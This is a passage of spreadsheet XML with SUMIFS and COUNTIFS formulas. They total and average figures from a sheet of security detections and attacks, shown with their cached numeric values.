        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>350</v>
      </c>
      <c r="AR75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>247</v>
      </c>
      <c r="AS75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>9</v>
      </c>
      <c r="AV75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>9</v>
      </c>
      <c r="BA75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>12</v>
      </c>
      <c r="BB75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>91649</v>
      </c>
      <c r="BD75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>2</v>
      </c>
      <c r="BF75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>9</v>
      </c>
      <c r="BG75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>2</v>
      </c>
      <c r="BJ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>5</v>
      </c>
      <c r="BL75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3470812</v>
      </c>
      <c r="BN75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1081436</v>
      </c>
      <c r="BO75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>1</v>
      </c>
      <c r="BT75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>266</v>
      </c>
      <c r="CA75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>6</v>
      </c>
      <c r="CI75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>34</v>
      </c>
      <c r="CJ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>14</v>
      </c>
      <c r="CL75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>12</v>
      </c>
      <c r="CN75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>13</v>
      </c>
      <c r="CP75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>29</v>
      </c>
      <c r="CQ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>9556</v>
      </c>
      <c r="CT75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>7</v>
      </c>
      <c r="CY75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>64</v>
      </c>
      <c r="CZ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>4</v>
      </c>
      <c r="DF75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>22</v>
      </c>
      <c r="DI75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>11609</v>
      </c>
      <c r="DJ75" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>9</v>
      </c>
      <c r="DK75" s="271"/>
      <c r="DO75" s="279"/>
      <c r="DP75" s="271"/>
      <c r="DQ75" s="271"/>
      <c r="DR75" s="271"/>
      <c r="DS75" s="271"/>
      <c r="DT75" s="271"/>
      <c r="DU75" s="271"/>
      <c r="DV75" s="271"/>
      <c r="DW75" s="271"/>
      <c r="DX75" s="271"/>
      <c r="DY75" s="271"/>
      <c r="DZ75" s="271"/>
      <c r="EA75" s="271"/>
      <c r="EB75" s="271"/>
      <c r="EC75" s="271"/>
      <c r="ED75" s="280"/>
      <c r="EG75" s="279"/>
      <c r="EH75" s="271"/>
      <c r="EI75" s="271"/>
      <c r="EJ75" s="271"/>
      <c r="EK75" s="271"/>
      <c r="EL75" s="271"/>
      <c r="EM75" s="271"/>
      <c r="EN75" s="271"/>
      <c r="EO75" s="271"/>
      <c r="EP75" s="478"/>
      <c r="EQ75" s="478"/>
      <c r="ER75" s="478"/>
      <c r="ES75" s="271"/>
      <c r="ET75" s="271"/>
      <c r="EU75" s="271"/>
      <c r="EV75" s="271"/>
      <c r="EW75" s="271"/>
      <c r="EX75" s="271"/>
      <c r="EY75" s="271"/>
      <c r="EZ75" s="271"/>
      <c r="FA75" s="280"/>
      <c r="FD75" s="480"/>
      <c r="FE75" s="480"/>
      <c r="FF75" s="480"/>
      <c r="FG75" s="480"/>
      <c r="FH75" s="480"/>
      <c r="FI75" s="480"/>
      <c r="FJ75" s="480"/>
      <c r="FK75" s="480"/>
      <c r="FL75" s="480"/>
      <c r="FM75" s="480"/>
      <c r="FN75" s="480"/>
      <c r="FO75" s="480"/>
      <c r="FP75" s="480"/>
      <c r="FQ75" s="480"/>
      <c r="FR75" s="480"/>
      <c r="FS75" s="480"/>
      <c r="FT75" s="480"/>
      <c r="FU75" s="480"/>
      <c r="FV75" s="480"/>
      <c r="FW75" s="480"/>
      <c r="FX75" s="480"/>
      <c r="FY75" s="379" t="s">
        <v>357</v>
      </c>
      <c r="FZ75" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GA75" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="GB75" s="480"/>
      <c r="GC75" s="379" t="s">
        <v>357</v>
      </c>
      <c r="GD75" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="GE75" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="GF75" s="480"/>
      <c r="GG75" s="480"/>
      <c r="GH75" s="480"/>
      <c r="GI75" s="480"/>
      <c r="GJ75" s="480"/>
      <c r="GK75" s="480"/>
      <c r="GL75" s="480"/>
      <c r="GM75" s="480"/>
      <c r="GN75" s="480"/>
      <c r="GO75" s="480"/>
      <c r="GP75" s="480"/>
      <c r="GQ75" s="480"/>
      <c r="GR75" s="480"/>
      <c r="GS75" s="480"/>
      <c r="GT75" s="480"/>
      <c r="GU75" s="480"/>
      <c r="GV75" s="480"/>
      <c r="GW75" s="480"/>
      <c r="GX75" s="480"/>
      <c r="GY75" s="480"/>
      <c r="GZ75" s="480"/>
      <c r="HA75" s="480"/>
      <c r="HB75" s="480"/>
      <c r="HC75" s="480"/>
      <c r="HD75" s="480"/>
      <c r="HE75" s="480"/>
      <c r="HF75" s="480"/>
      <c r="HG75" s="480"/>
      <c r="HH75" s="480"/>
      <c r="HI75" s="480"/>
      <c r="HJ75" s="480"/>
      <c r="HK75" s="480"/>
      <c r="HL75" s="480"/>
      <c r="HM75" s="480"/>
      <c r="HN75" s="480"/>
      <c r="HO75" s="480"/>
      <c r="HP75" s="480"/>
    </row>
    <row r="76">
      <c r="J76" s="277"/>
      <c r="K76" s="434"/>
      <c r="L76" s="353"/>
      <c r="M76" s="353"/>
      <c r="N76" s="354"/>
      <c r="O76" s="278"/>
      <c r="Q76" s="271"/>
      <c r="R76" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="S76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3718</v>
      </c>
      <c r="T76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>168</v>
      </c>
      <c r="V76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>54</v>
      </c>
      <c r="W76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="X76" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CQ3:$CQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>18568</v>
      </c>
      <c r="Y76" s="353">
